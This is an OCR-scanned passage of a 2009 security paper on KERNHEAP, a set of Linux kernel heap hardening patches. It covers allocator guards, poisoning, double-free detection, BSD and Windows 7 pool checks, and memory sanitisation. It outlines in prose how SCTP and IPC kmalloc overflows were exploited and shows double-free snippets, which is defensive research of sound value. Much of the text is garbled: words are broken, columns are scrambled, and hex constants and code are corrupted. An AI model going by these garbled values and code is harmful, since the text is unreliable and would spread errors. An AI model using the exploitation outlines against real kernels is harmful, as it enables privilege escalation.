structure per CPU can be observed. An article at LWN.net by 
Jonathan Corbet in December 2008, provides a summary about the 
Significance of this structure: 


"Within that per-CPU structure one will find a number of lists 
of objects. One of those (freelist) contains a list of 
available objects; when a request is made to allocate an 
object, the free list will be consulted first. When objects are 
freed, they are returned to this list. Since this list is part 
of a per-CPU data structure, objects normally remain on the 
same processor, minimizing cache line bouncing. More 
importantly, the allocation decisions are all done per-CPU, 
with no bad cache behavior and no locking required beyond the 
disabling of interrupts. The free list is managed as a stack, 
so allocation requests will return the most recently freed 
objects; again, this approach is taken in an attempt to 
optimize memory cache behavior." [5] 


In order to couple with memory stress situations, the freelists 

can be flushed to return unused partial objects back to the page 
allocator when necessary. This works by moving the object to the 
remote freelist (rlist) from the CPU-local freelist, and keep a 

reference in the remote_fr list. 


The SLOB allocator is well described in depth in the aforementioned 
article and the source code comments. Feel fr to refer to these 
sources for more in-depth information about its design and 
implementation. The original RFC and patch can be found at 
http://lkml.org/1km1/2008/12/11/417 


1.5 The future 


As architectures and computing platforms evolve, so will the 
allocators in the Linux kernel. The current development process 
doesn’t contribute to a more stable, smaller set of options, and it 
will be inevitable to see new allocators introduced into the kernel 
mainline, possibly specialized for certain environments. 


In the short term, SLUB will remain the default, and there seems to 
be an intention to remove SLOB. It is unclear if SLBQ will see 
widely spread deployment. 
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Newly developed allocators will require careful assessment, since 
KERNHEAP is tied to certain assumptions about their internals. For 
i 
a 
s 


nstance, we depend on the ability to track object sizes properly, 
nd it remains untested for some obscure architectures, NUMA 
ystems and so forth. Even a simple allocator like SLOB posed a 
challenge to implement safety checks, since the internals are 
greatly convoluted. Thus, it’s uncertain if future ones will 
require a redesign of the concepts composing KERNHEAP. 


------ [ 2. Introduction: What is KERNHEAP? 


As of April 2009, no operating system has implemented any form of 
hardening in its kernel heap management interfaces. Attacks against the 
SLAB allocator in Linux have been documented and made available to the 
public as early as 2005, and used to develop highly reliable exploits 
to abuse different kernel vulnerabilities involving heap allocated 
buffers. The first public exploit making use of kmalloc() exploitation 
techniques was the MCAST_MSFILTER exploit by twiz [10]. 


In January 2009, an obscure, non advertised advisory surfaced about a 
buffer overflow in the SCTP implementation in the Linux kernel, which 
could be abused remotely, provided that a SCTP based service was 
listening on the target host. More specifically, the issue was located 
in the code which processes the stream numbers contained in FORWARD-TSN 
chunks. 


During a SCTP association, a client sends an INIT chunk specifying a 
number of inbound and outbound streams, which causes the kernel in the 
server to allocate space for them via kmalloc(). After the association 
is made effective (involving the exchange of INIT-ACK, COOKIE and 
COOKIE-ECHO chunks), the attacker can send a FORWARD-TSN chunk with 
more streams than those specified initially in the INIT chunk, leading 
to the overflow condition which can be used to overwrite adjacent heap 
objects with attacker controlled data. The vulnerability itself had 
certain quirks and requirements which made it a good candidate for a 
complex exploit, unlikely to be available to the general public, thus 
restricted to more technically adept circles on kernel exploitation. 
Nonetheless, reliabl xploits for this issue were developed and 
successfully used in different scenarios (including all major 
distributions, such as Red Hat with SELinux enabled, and Ubuntu with 
AppArmor) . 


At some point, Brad Spengler expressed interest on a potential protection 
against this vulnerability class, and asked the author what kind of 
measures could be taken to prevent new kernel-land heap related bugs 

from being exploited. Shortly afterwards, KERNHEAP was born. 


After development started, a fully remote exploit against the SCTP flaw 
surfaced, developed by sgrakkyu [15]. In private discussions with few 
individuals, a technique for executing a successful attack remotely was 
proposed: overwrite a syscall pointer to an attacker controlled 
location (like a hook) to safely execute our payload out of the 
interrupt context. This is exactly what sgrakkyu implemented for 
x86_64, using the vsyscall table, which bypasses CONFIG_DEBUG_RODATA 
(read-only .rodata) restrictions altogether. His exploit exposed not 
fe) 
s 
Ss 
S 


nly the flawed nature of the vulnerability classification process of 
everal organizations, the hypocritical and unethical handling of 
ecurity flaws of the Linux kernel developers, but also the futility of 
ELinux and other security models against kernel vulnerabilities. 


In order to prevent and detect exploitation of this class of security 
flaws in the kernel, a new set of protections had to be designed and 
implemented: KERNHEAP. 


KERNHEAP encompasses different concepts to prevent and detect heap 
overflows in the Linux kernel, as well as other well known heap related 
vulnerabilities, namely double frees, partial overwrites, etc. 
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These concepts have been implemented introducing modifications into the 
different allocators, as well as common interfaces, not only 
preventing generic forms of memory corruption but also hardening 
specific areas of the kernel which have been used or could be 
potentially used to leverage attacks corrupting the heap. For instance, 
the IPC subsystem, the copy_to_user() and copy_from_user() APIs and 
others. 


This is still ongoing research and the Linux kernel is an ever evolving 
project which poses significant challenges. The inclusion of new 
a 
t 


llocators will always pose a risk for new issues to surface, requiring 
hese protections to be adapted, or new ones developed for them. 


Taras [ 3. Integrity assurance for kernel heap allocators 


---[ 3.1 Meta-data protection against full and partial overwrites 


As of the current (yet ever changing) upstream design of the current 
kernel allocators (SLUB, SLAB, SLOB, future SLOB, etc.), we assume: 


1. A set of caches exist which hold dynamically allocated slabs, 
composed of one of more physically contiguous pages, containing 
same size chunks. 


2. These are initialized by default or created explicitly, always 
with a known size. For example, multiple default caches exist to 
hold slabs of common sizes which are a multiple of two (32, 64, 
128, 256 and so forth). 


3. These caches grow or shrink in size as required by the 
allocator. 


4. At the end of a kmem cache life, it must be destroyed and its 
slabs released. The linked list of slabs is implicitly trusted 
in this context. 


5. The caches can be allocated contiguously, or adjacent to an 
actual chain of slabs from another cache. Because the current 
kmem_cache structure holds potentially harmful information 
(including a pointer to the constructor of the cache), this 
could be leveraged in an attack to subvert the execution flow. 


6. The debugging facilities of these allocators provide a merely 
informational value with their error detection mechanisms, which 
are also inherently insecure. They are not enabled by default 
and have a extremely high performance impact (accounting up to 
50 to 70% slowdown). In addition, they leak information which 
could be invaluable for a local attacker (ex. fixed known 
values). 


We are facing multiple issues in this scenario. First, the kernel 
developers expect the third-party to handle situations like a cache 
being destroyed while an object is being allocated. Albeit highly 
unusual, such circumstances (like {6}) can arise provided the right 
conditions are present. 


In order to prevent {5} from being abused, we are left with two 
realistic possibilities to deter a potential attack: randomization of 
the allocator routines (see ASLR from the PaX documentation in [7] for 
t 

W 

Ss 


he concept) or introduce a guard (known in modern times as a '’cookie’) 
hich contains information to validate the integrity of the kmem_cache 
tructure. 


Thus, a decision was made to introduce a guard which works in 
"cascade’: 
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| global guard | 
+ | kmem_cache guard 


slab guard 


The idea is simple: break down every potential path of abuse and add 
integrity information to each lower level structure. By deploying a 
check which relies in all the upper level guards, we can detect 
corruption of the data at any stage. In addition, this makes the safety 
checks more resilient against information leaks, since an attacker will 
be forced to access and read a wider range of values than one single 
cookie. Such data could be out of range to the context of the execution 
path being abused. 


The global guard is initialized at the kernheap_init () 

function, called from init/main.c during kernel start. In order to 
gather entropy for its value, we need to initialize the random32 PRNG 
earlier than in a default, upstream kernel. On x86, this is done with 
the rdtsc xor’d with the jiffies value, and then seeded multiple times 
during different stages of the kernel initialization, ensuring we have 
a decent amount of entropy to avoid an easily predictable result. 


Unfortunately, an architecture-independent method to seed the PRNG 
hasn’t been devised yet. Right now this is specific to platforms with a 
working get_cycles() implementation (otherwise it falls back to a more 
insecure seeding using different counters), though it is intended to 
support all architectures where PaX is currently supported. 


The slab and kmem_cache structures are defined in mm/slab.c and 
mm/slub.c for the SLAB and SLUB allocators, respectively. The kernel 
developers have chosen to make their type information static to those 
files, and not available in the mm/slab.h header file. Since the 
available allocators have generally different internals, they only 
export a common API (even though few functions remain as no-op, for 
example in SLOB). 


A guard field has been added at the start of the kmem_cache structure, 
and other structures might be modified to include a similar field 
(depending on the allocator). The approach is to add a guard anywhere 
where it can provide balanced performance (including memory footprint) 
and security results. 


In order to calculate the final checksum used in each kmem_cache and 
their slabs, a high performance, yet collision resistant hash function 
was required. This instantly left options such as the CRC family, FNV, 
etc. out, since they are inefficient for our purposes. Therefore, 
Murmur2 was chosen [9]. It’s an exceptionally fast, yet simple 
algorithm created by Austin Appleby, currently used by libmemcached and 
other software. 


Custom optimized versions were developed to calculate hashes for the 
slab and cache structures, taking advantage of the fact that only a 
relatively small set of word values need to be hashed. 


The coverage of the guard checks is obviously limited to the meta-data, 
but yields reliable protection for all objects of 1/8 page size and any 
adjacent ones, during allocation and release operations. The 
copy_from_user() and copy_to_user() functions have been modified to 
include a slab and cache integrity check as well, which is orthogonal 
to the boundary enforcement modifications explained in another section 
of this paper. 


The redzone approach used by the SLAB/SLUB/SLOQB allocators used a fixed 
known value to detect certain scenarios (explained in the next 
subsection). The values are 64-bit long: 


define RED_INACTIVE 0x09F911029D74E35BULL 
define RED_ACTIVE 0xD84156C5635688COULL 
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This is clearly suitable for debugging purposes, but largely 
inefficient for security. An immediate improvement would be to generat 
these values on runtime, but then it is still possible to avoid writing 
over them and still modify the meta-data. This is exactly what is being 
prevented by using a checksum guard, which depends on a runtime 
generated cookie (at boot time). Th xamples below show an overwrite 
of an object in the kmalloc-64 cache: 


slab error in verify_redzone_free(): cache ‘size-64’: memory outside 
object was overwritten 

Pid: 6643, comm: insmod Not tainted 2.6.29.2-grsec #1 

Call Trace: 

<c0889a81>] __ slab_error+0xla/Oxlc 

<c088aee9>] cache_free_debugcheck+0x137/0x1f5 

<c088bal4>] kfreet+0x9d/0xd2 

<c0802f22>] syscall_call+0x7/0xb 

d£271338: redzone 1:0xd84156c5635688c0, redzone 2:0x4141414141414141. 


Slab corruption: size-64 start=df271398, len=64 
Redzone: 0x4141414141414141/0x9f911029d74e35b. 

Last user: [<c08dlda5>] (free_rb_tree_fnamet+0x38/0x6f) 
000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 421 
010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 421 
020: 41 41 41 41 41 41 41 41 6b 6b 6b 6b 6b 6b 6b 6b 
Prev obj: start=df£271340, len=64 


Redzone: 0xd84156c5635688c0/0xd84156c5635688c0. 

Last user: [<c08d1e55>] (ext3_htree_store_dirent+0x34/0x124) 
000: 48 8e 78 08 3b 49 86 3d a8 1f 27 df e0 10 27 df 

010: a8 14 27 df 00 00 00 00 62 d3 03 00 Oc 01 75 64 

Next obj: start=df2713f0, len=64 


Redzone: 0x9f911029d74e35b/0x9f911029d74e35b. 

Last user: [<c08dlda5>] (free_rb_tree_fnamet+0x38/0x6f) 
000: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 
010: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 


The trail of 0Ox6B bytes can be observed in the output above. This is 
the SLAB POISON feature. Poisoning is the approach that will be 
described in the next subsection. It’s basically overwriting the object 
contents with a known value to detect modifications post-release or 
uninitialized usage. The values are defined (like the redzone ones) at 
include/linux/poison.h: 


define POISON_INUSE Ox5a 
define POISON_FREE Ox6b 
define POISON_END Oxa5 


KERNHEAP performs validation of the cache guards at allocation and 
release related functions. This allows detection of corruption in the 
chain of guards and results in a system halt and a stack dump. 


The safety checks are triggered from kfree() and kmem_cache_free(), 
kmem_cache_destroy() and other places. Additional checkpoints are being 
considered, since taking a wrong approach could lead to TOCTOU issues, 
again depending on the allocator. In SLUB, merging is disabled to avoid 
the potentially detrimental effects (to security) of this feature. This 
might kill one of the most attractive points of SLUB, but merging comes 
at the cost of letting objects be neighbors to other objects which 
would have been placed elsewhere out of reach, allowing overflow 
conditions to produce likely exploitable conditions. Even with guard 
checks in place, this is still a scenario to be avoided. 


One additional change, first introduced by PaX, is to change the 


address of the ZERO_SIZE_PTR. In mainline kernel, this address points 
to 0x00000010. An address reachable in userland is clearly a bad idea 
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in security terms, and PaX wisely solves this by setting it to 
Oxfffffc00, and modifying the ZERO_OR_NULL_PTR macro. This protects 
against a situation in which kmalloc is called with a zero size (for 
example due to an integer overflow in a length parameter) and the 
pointer is used to read or write information from or to userland. 


---[ 3.2 Detection of arbitrary free pointers and freelist corruption 


In the history of heap related memory corruption vulnerabilities, a 
more obscure class of flaws has been long time known, albeit less 
publicized: arbitrary pointer and double free issues. 


The idea is simple: a programming mistake leads to an exploitable 
condition in which the state of the heap allocator can be made 
inconsistent when an already freed object is being released again, or 
an arbitrary pointer is passed to the free function. This is a strictly 
allocator internals-dependent scenario, but generally the goal is to 
control a function pointer (for example, a constructor/destructor 
function used for object initialization, which is later called) ora 
write-n primitive (a single byte, four bytes and so forth). 


In practice, these vulnerabilities can pose a true challenge for 
exploitation, since thorough knowledge of the allocator and state of 
the heap is required. Manipulating the freelist (also known as 
freelist in the kernel) might cause the state of the heap to be 
unstable post-exploitation and thwart cleanup efforts or graceful 
returns. In addition, another thread might try to access it or perform 
operations (such as an allocation) which yields a page fault. 


In an environment with 2.6.29.2 (grsecurity patch applied, full Pax 
feature set enabled except for KERNEXEC, RANDKSTACK and UDEREF) and the 
SLAB allocator, the following scenarios could be observed: 


1. An object is allocated and shortly afterwards, the object is 
released via kfree(). Another allocation follows, and a pointer 
referencing to the previous allocation is passed to kfree(), 
therefore the newly allocated object is released instead due to the 
LIFO nature of the allocator. 


void *a kmalloc(64, GEFP_KERNEL) ; 
foo_t *b = (foo_t *) a; 


[XE vaneves Bf 
kfree(a); 
a = kmalloc(64, GFP_KERNEL) ; 


Ls al RY] 
kfree(b); 
2. An object is allocated, and two successive calls to kfree() take 


place with no allocation in-between. 


void *a kmalloc(64, GEP_KERNEL) ; 
foo_t *b = (foo_t *) a; 


kfree(a); 
kfree(b); 


In both cases we are releasing an object twice, but the state of the 
allocator changes slightly. Also, there could be more than just a 
single allocation in-between (for example, if this condition existed 
within filesystem or network stack code) leading to less predictable 
results. The more obvious result of the first scenario is corruption of 
the freelist, and a potential information leak or arbitrary access to 
memory in the second (for instance, if an attacker could force a new 
allocation before the incorrectly released object is used, he could 
control the information stored there). 


The following output can be observed in a system using the SLAB 
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allocator with is debugging facilities enabled: 


slab error in verify_redzone_free(): 
Pid: 4078, comm: insmod Not tainted 2.6.29.2-grsec #1 


Call Trace: 


cache ‘size-64’: doubl 


EY detected 


tOxla/Oxlc 


_debugcheck+0x137/0x1£5 


[<c0889a81>] __ slab_errort 
[<cO88aee9>] cache_fr 
[<c088bal4>] kfreet+0x9d/0xd2 
[<c0802f22>] syscall_call+t 


tOx7/O0xb 
daf2e42e0: redzone 1:0x9f911029d74e35b, 


The debugging facilities of SLAB and SLUB provide a redzone-bas 


approach to detect the first scenario, 


impact while being useless security-wise, since the system won’t 
and the state of the allocator will be left unstable. Therefore, 
value is only informational and useful for debugging purposes, n 


security measure. The redzon 


values ar 


redzone 2:0x9f911029d74e35b. 


d 


but introduce a performance 


halt 


also static. 


The other approach taken by the debugging facilities is poisonin 
mentioned in the previous subsection. An 
value, which can be checked at different places to detect if the 
is being used uninitialized or post-release. This rudimentary bu 
effective method is implemented upstream in a manner which makes it 
inefficient for security purposes. 


object is /’poisoned’ wi 


Currently, upstream poisoning is clearly oriented to debugging. 


writes a single-byte pattern 


with a known value. This incurs 


writing: 


in the whole object space, marking 


1. During cache destruction: 


The guard value is verified. 


b) Th ntire cache is walked, 


potential corruption 


. Reference counters, guards, validi 
pointers and other structures ar 
found, a system halt ensues. 


checked. If any misma 
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their 
ot asa 


g, as 
tha 

object 
t 


i ic 
the end 


in a significant performance impact. 


KERNHEAP performs the following safety checks at the time of this 


verifying the freelists for 


ty of 
tch is 


c) The pointer to the cache itself is changed to ZERO_SI 
This should not affect any well behaving (that is, not b 


kernel code. 


2. After successful kfree, 


a word value is written to the me 


and pointer location is changed to ZERO_SIZE_PTR. This wi 


trigger a distinctive page fault if the pointer is access 
again somewhere. Currently this operation could be invasi 
drivers or code with dubious coding practices. 


3. During allocation, if the word value at the start of the 


to-be-returned object doesn’t match our post-free value, 


system halt ensues. 


for some of the more general 


to the deployment of PaxX’s R 


reference counters against overf] 


The object-level guard values 


of inline functions, instead of external 


(equivalent to the redzoning) are 
calculated on runtime. This deters bypassing of the checks via fake 
objects, resulting from a slab overflow scenario. 
low performance impact on setup and verification, minimized by t 


definitions like those 


cache checks. 


EFCOUNT, 


Th ffectiveness of the reference counter checks is orthogonal 
which protects many object 


ows (including SLAB/SLUB) . 


n all 


Safe unlinking is enforced i 


LIST_HI! 


FAD based linked lists, 


ZE_PTR. 
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obviously includes the partial/empty/full lists for SLAB and several 
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r structures (including the freelists) in other allocators. If a 

upted entry is being unlinked, a system halt is forced. The values 
for list pointer poisoning have been changed to point 

userland-reachable addresses (this change has been taken from PaX). 


use-after-fr and double-free detection mechanisms in KERNHEAP are 


stil 
chan 


soe 


At t 
inte 
kern 
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Both 
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copy 
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l under development, and it’s very likely that substantial design 
ges will occur after the release of this paper. 


3.3 Overview of NetBSD and OpenBSD kernel heap safety checks 


he moment KERNHEAP exclusively covers the Linux kernel, but it is 
resting to observe the approaches taken by other projects to detect 
el heap integrity issues. In this section we will briefly analyze 
NetBSD and OpenBSD kernels, which are largely the same code base in 
rds of kernel malloc implementation and diagnostic checks. 


currently implement rudimentary but effective measures to detect 
after-free and double-free scenarios, albeit these are only enabled as 
of the DIAGNOSTIC and DEBUG configurations. 


following source code is taken from NetBSD 4.0 and should be almost 
tical to OpenBSD. Their approach to detect use-after-fr relies on 
ing a known 32-bit value (WEIRD_ADDR, from kern/kern_malloc.c): 


/* 
* The WEIRD_ADDR is used as known text to copy into free objects so 
* that modifications after frees can be detected. 

Al 
#define WEIRD_ADDR ((uint32_t) Oxdeadbeef) 


void *malloc(unsigned long size, struct malloc_type *ksp, int flags) 


{ 


#ifdef DIAGNOSTIC 
fe 
* Copy in known text to detect modification 
* after freeing. 
*/ 
end = (uint32_t *)&cp[copysize]; 
for (lp = (uint32_t *)cp; lp < end; lpt+) 
*lp = WEIRD_ADDR; 
freep->type = M_FREE; 
#endif /* DIAGNOSTIC */ 


following checks are the counterparts in free(), which call panic() when 
checks fail, causing a system halt (this obviously has a better security 
fit than just the information approach taken by Linux’s SLAB 


diagnostics): 


#ifdef DIAGNOSTIC 


if (__predict_false(freep->spare0 == WEIRD_ADDR)) { 


for (cp = kbp->kb_next; cp; 
cp = ((struct freelist *)cp)->next) { 
if (addr != cp) 


continue; 
printf("multiply freed item %p\n", addr); 
panic("free: duplicated free"); 


} 


copysize = size < MAX_COPY ? size : MAX_COPY; 
end = (int32_t *)&((caddr_t) addr) [copysize]; 
for (lp = (int32_t *)addr; lp < end; Il1ptt+) 

lp = WEIRD_ADDR; 


A | 
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freep->type = ksp; 
#endif /* DIAGNOSTIC */ 


ie) 


nce the object is released, the 32-bit value is copied, along the type 
information to detect the potential origin of the problem. This should be 
nough to catch basic forms of freelist corruption. 


0) 


It’s worth noting that the freelist_sanitycheck() function provides 
integrity checking for the freelist, but is enclosed in an ifdef 0 block. 


The problem affecting these diagnostic checks is the use of known values, as 
much as Linux’s own SLAB redzoning and poisoning might be easily bypassed in 
a deliberate attack scenario. It still remains slightly mor ffective du 
to the system halt enforcing upon detection, which isn’t present in Linux. 


Other sanity checks are done with the reference counters in free(): 


if (ksp->ks_inuse == 0) 
panic("free 1: inuse 0, probable double free"); 


And validating (with a simple address range test) if the pointer being 
freed looks sane: 


if (__predict_false((vaddr_t)addr < vm_map_min(kmem_map) | | 
(vaddr_t)addr >= vm_map_max (kmem_map) ) ) 
panic("free: addr Sp not within kmem_map", addr); 


Ultimately, users of either NetBSD or OpenBSD might want to enable 
KMEMSTATS or DIAGNOSTIC configurations to provide basic protection against 
heap corruption in those systems. 


---[ 3.4 Microsoft Windows 7 kernel pool allocator safe unlinking 


In 26 May 2009, a suspiciously timed article was published by Peter 
Beck from the Microsoft Security Engineering Center (MSEC) Security 
Science team, about the inclusion of safe unlinking into the Windows 7 
kernel pool (the equivalent to the slab allocators in Linux). 


This has received a deal of publicity for a change which accounts up to 
two lines of effective code, and surprisingly enough, was already 
present in non-retail versions of Vista. In addition, safe unlinking 
has been present in other heap allocators for a long time: in the GNU 
libc since at least 2.3.5 (proposed by Stefan Esser originally to Solar 
Designer for the Owl libc) and the Linux kernel since 2006 
(CONFIG_DEBUG_LIST). 


While it is out of scope for this paper to explain the internals of the 
Windows kernel pool allocator, this section will provide a short 
overview of it. For true insight the slides by Kostya Kortchinsky, 
"Exploiting Kernel Pool Overflows" [14], can provide a through look at 
it from a sound security perspective. 


The allocator is very similar to SLAB and the API to obtain allocations 
and release them is straightforward (nt!ExAllocatePool (WithTag) , 
nt!ExFreePool (WithTag) and so forth). The default pools (sort of a 

k 

fe) 


mem_cache equivalent) are the (two) paged, non-paged and session paged 
nes. Non-paged for physical memory allocations and paged for pageable 
memory. The structure defining a pool can be seen below: 


kd> dt nt!_POOL_DESCRIPTOR 
+0x000 PoolType : _POOL_TYPE 
+0x004 PoolIndex : Uint4B 
+0x008 RunningAllocs : Uint4B 
+0x00c RunningDeAllocs : Uint4B 
+0x010 TotalPages : Uint4B 
+0x014 TotalBigPages : Uint4B 
+0x018 Threshold : Uint4B 
+0xO0lc LockAddress : Ptr32 Void 
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+0x020 PendingFrees : Ptr32 Void 
+0x024 PendingFreeDepth : Int4B 
+0x028 ListHeads : [512] _LIST_ENTRY 


The most important member in the structure is ListHeads, which contains 
512 linked lists, to hold the free chunks. The granularity of 

the allocator is 8 bytes for Windows XP and up, and 32 bytes for 
Windows 2000. The maximum allocation size possible is 4080 bytes. 
LIST_ENTRY is exactly the same as LIST_HEAD in Linux. 


Each chunk contains a 8 byte header. The chunk header is defined as 


follows for Windows XP and up: 
kd> dt nt!_POOL_HEADER 

+0x000 PreviousSize : Pos 0, 9 Bits 
+0x000 PoolIndex : Pos 9, 7 Bits 
+0x002 BlockSize : Pos 0, 9 Bits 
+0x002 PoolType : Pos 9, 7 Bits 
+0x000 Ulongl : Uint4B 
+0x004 ProcessBilled : Ptr32 _EPROCESS 
+0x004 PoolTag : Uint4B 
+0x004 AllocatorBackTraceIndex : Uint2B 
+0x006 PoolTagHash : Uint2B 

The PreviousSize contains the value of the BlockSize of the previous 


chunk, or zero if it’s the first. This value could be checked during 
unlinking for additional safety, but this isn’t the case (their checks 
are limited to validity of prev/next pointers relative to the entry 
being deleted). PooType is zero if free, and PoolTag contains four 
printable characters to identify the user of the allocation. This isn’t 
authenticated nor verified in any way, therefore it is possible to 
provide a bogus tag to one of the allocation or free APIs. 


For small allocations, the pool allocator uses lookaside caches, with a 
maximum BlockSize of 256 bytes. 


Kostya’s approach to abuse pool allocator overflows involves the 
classic write-4 primitive through unlinking of a fake chunk under his 
control. For the rest of information about the allocator internals, 
please refer to his excellent slides [14]. 


The minimal change introduced by Microsoft to enable safe unlinking in 
Windows 7 was already present in Vista non-retail builds, thus it is 
likely that the announcement was merely a marketing exercis 
Furthermore, Beck states that this allows to detect "memory corruption 
at the earliest opportunity", which isn’t necessarily correct if they 
had pursued a more complete solution (for example, verifying that 


pointers belong to actual freelist chunks). Those might incur in a 
higher performance overhead, but provide far more consistent 
protection. 


The affected API is RemoveEntryList(), and the result of unlinking an 
entry with incorrect prev/next pointers will be a BugCheck: 


Flink = Entry->Flink; 
Blink = Entry->Blink; 
i 
j 


(Flink->Blink != Entry) KeBugCheck 
(Blink->Flink != Entry) KeBugCheck 


(...)3 
(...)3 


Fh Fh 


= 
rx 
= 

rx 


It’s unlikely that there will be further changes to the pool allocator 
for Windows 7, but there’s still time for this to change before releas 
date. 


------ [ 4. Sanitizing memory of the look-aside caches 


The objects and data contained in slabs allocated within the kmem 
caches could be of sensitive nature, including but not limited to: 
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cryptographic secrets, PRNG state information, network information, 
userland credentials and potentially useful internal kernel state 
information to leverage an attack (including our guards or cookie 
values). 


In addition, neither kfree() nor kmalloc() zero memory, thus allowing 
the information to stay there for an indefinite time, unless they ar 
overwritten after the space is claimed in an allocation procedure. This 
i 

fe) 


Ss a security risk by itself, since an attacker could essentially rely 
n this condition to "spray" the kernel heap with his own fake 
structures or machine instructions to further improve the reliability 
of his attack. 


PaX already provides a feature to sanitize memory upon release, at a 
performance cost of roughly 3%. This an opt-all policy, thus it 

is not possible to choose in a fine-grained manner what memory is 
sanitized and what isn’t. Also, it works at the lowest level possible, 
the page allocator. While this is a safe approach and ensures that all 
allocated memory is properly sanitized, it is desirable to be able to 
opt-in voluntarily to have your newly allocated memory treated as 
sensitive. 


Hence, a GFP_SENSITIVE flag has been introduced. While a security 
conscious developer could zero memory on his own, the availability of a 
flag to assure this behavior (as well as other enhancements and safety 
checks) is convenient. Also, the performance cost is negligible, if 
any, Since the flag could be applied to specific allocations or caches 
altogether. 


The low level page allocator uses a PF_sensitive flag internally, with 
the associated SetPageSensitive, ClearPagesensitiv and PageSensitive 


macros. These changes have been introduced in the linux/page-flags.h 
header and mm/page_alloc.c. 


SLAB / kmalloc layer Low-level page allocator 
include/linux/slab.h include/linux/page-flags.h 


SLAB_SENSITIV 


i 
| 
Vv 


PG_sensitive 


| 
| 
\---> GFP_SENSITIVI 


| 

| |-> SetPageSensitive 

| |-> ClearPageSensitive 
-/ |-> PageSensitive 


E 


This will prevent the aforementioned leak of information post-release, 
and provide an easy to use mechanism for third-party developers to take 
advantage of the additional assurance provided by this feature. 


In addition, another loophole that has been removed is related with 

situations in which successive allocations are done via kmalloc(), and 
the information is still accessible through the newly allocated object. 
T 
a 
( 


his happens when the slab is never released back to the page 

llocator, since slabs can live for an indefinite amount of time 
there’s no assurance as to when the cache will go through shrinkage or 
reaping). Upon release, the cache can be checked for the SLAB SENSITIVE 
flag, the page can be checked for the PG_sensitive bit, and the 
allocation flags can be checked for GFP_SENSITIVE. 


Currently, the following interfaces have been modified to operate with 
this flag when appropriate: 


IPC kmem cache 
Cryptographic subsystem (CryptoAPI) 
— TTY buffer and auditing API 
WEP encryption and decryption in mac80211 (key storage only) 
—- AF_KEY sockets implementation 
- Audit subsystem 
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The RBAC engine in grsecurity can be modified to add support for 
enabling the sensitive memory flag per-process. Also, a group id based 
check could be added, configurable via sysctl. This will allow 
fine-grained policy or group based deployment of the current and future 
benefits of this flag. SELinux and any other policy based security 
frameworks could benefit from this feature as well. 


This patchset has been proposed to the mainline kernel developers as of 


May 21st 2009 (see http://patchwork.kernel.org/patch/25062). It 
received feedback from Alan Cox and Rik van Riel and a different 
approach was used after some developers objected to the use of a page 
flag, since the functionality can be provided to SLAB/SLUB allocators 
and the VMA interfaces without the use of a page flag. Also, the naming 
changed to CONFIDENTIAL, to avoid confusion with the term ’sensitive’. 


Unfortunately, without a page bit, it’s impossible to track down what 
pages shall be sanitized upon release, and provide fine-grained control 
over these operations, making the gfp flag almost useless, as well as 
other interesting features, like sanitizing pages locked via mlock(). 
The mainline kernel developers oppose the introduction of a new page 
flag, even though SLUB and SLOB introduced their own flags when they 
were merged, and this wasn’t frowned upon in such cases. Hopefully this 
will change in the future, and allow a more complete approach to be 


merged 


in mainline at some point. 


Despite the fact that Ingo Molnar, Pekka Enberg and Peter Zijlstra 
completely missed the point about the initially proposed patches, 

new ones performing selective sanitization were sent following up their 
recommendations of a completely flawed approach. This case serves as a 
good example of how kernel developers without security knowledge nor 


xperi 


Linux kernel as a whole. 


nce take decisions that negatively impact conscious users of the 


Hopefully, in order to provide a reliable protection, the upstream 
approach will finally be selective sanitization using kzfree(), 
allowing us to redefine it to kfree() in the appropriate header file, 
and use something that actually works. Fixing a broken implementation 
is an undesirable burden often found when dealing with the 2.6 branch 


of the 


kernel, as usual. 


Deterrence of IPC based kmalloc() overflow exploitation 


In addition to the rest of the features which provide a generic 
protection against common scenarios of kernel heap corruption, a 
modification has been introduced to deter a specific local attack for 
abusing kmalloc() overflows successfully. This technique is currently 


the onl 


y public approach to kernel heap buffer overflow exploitation 


and rel 


lies on the following circumstances: 


The attacker has local access to the system and can use the IPC 
subsystem, more specifically, create, destroy and perform 
operations on semaphores. 


The attacker is able to abuse a allocate-overflow-fr situation 
hich can be leveraged to overwrite adjacent objects, also 
allocated via kmalloc() within the same kmem cache. 


= 


The attacker can trigger the overflow in the right timing to 
ensure that the adjacent object overwritten is under his 
control. In this case, the shmid_kernel structure (used 
internally within the IPC subsystem), leading to a userland 
pointer dereference, pointing at attacker controlled structures. 


Ultimately, when these attacker controlled structures are used 
by the IPC subsystem, a function pointer is called. Since the 
attacker controls this information, this is essentially a 
game-over scenario. The kernel will execute arbitrary code of 
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the attacker’s choice and this will lead to elevation of 
privileges. 


Currently, PaX UDEREF [8] on x86 provides solid protection against 

(3) and (4). The attacker will be unable to force the kernel into 
executing instructions located in the userland address space. A 
specific class of vulnerabilities, kernel NULL pointer deferences 
(which were, for a long time, overlooked and not considered exploitable 
by most of the public players in the security community, with few 
exceptions) were mostly eradicated (thanks to both UDEREF and further 
restrictions imposed on mmap(), later implemented by Red Hat and 
accepted into mainline, albeit containing flaws which made the 
restriction effectively useless). 


On systems where using UDEREF is unbearable for performance or 
functionality reasons (for example, virtualization), a workaround to 
harden the IPC subsystem was necessary. Hence, a set of simple safety 
c 

h 


hecks were devised for the shmid_kernel structure, and the allocation 
elper functions have been modified to use their own private cache. 


The function pointer verification checks if the pointers located within 
the file structure, are actually addresses within the kernel text range 
(including modules). 


The internal allocation procedures of the IPC code make use of both 
vmalloc() and kmalloc(), for sizes greater than a page or lower than a 
p 


= 


age, respectively. Thus, the size for the cache objects is PAGE_SIZE, 
which might be suboptimal in terms of memory space, but does not impact 
performance. These changes have been tested using the IBM ipc_stress 
test suite distributed in the Linux Test Project sources, with 
successful results (can be obtained from http://ltp.sourceforge.net). 


ae [ 6. Prevention of copy_to_user() and copy_from_user() abuse 


A vast amount of kernel vulnerabilities involving information leaks to 
userland, as well as buffer overflows when copying data from userland, 
are caused by signedness issues (meaning integer overflows, reference 
counter overflows, et cetera). The common scenario is an invalid 
integer passed to the copy_to_user() or copy_from_user() functions. 


During the development of KERNHEAP, a question was raised about these 
functions: Is there a existent, reliable API which allows retrieval of 
the target buffer information in both copy-to and copy-from scenarios? 


Introducing size awareness in these functions would provide a simple, 
yet effective method to deter both information leaks and buffer 
overflows through them. Obviously, like in every security system, the 
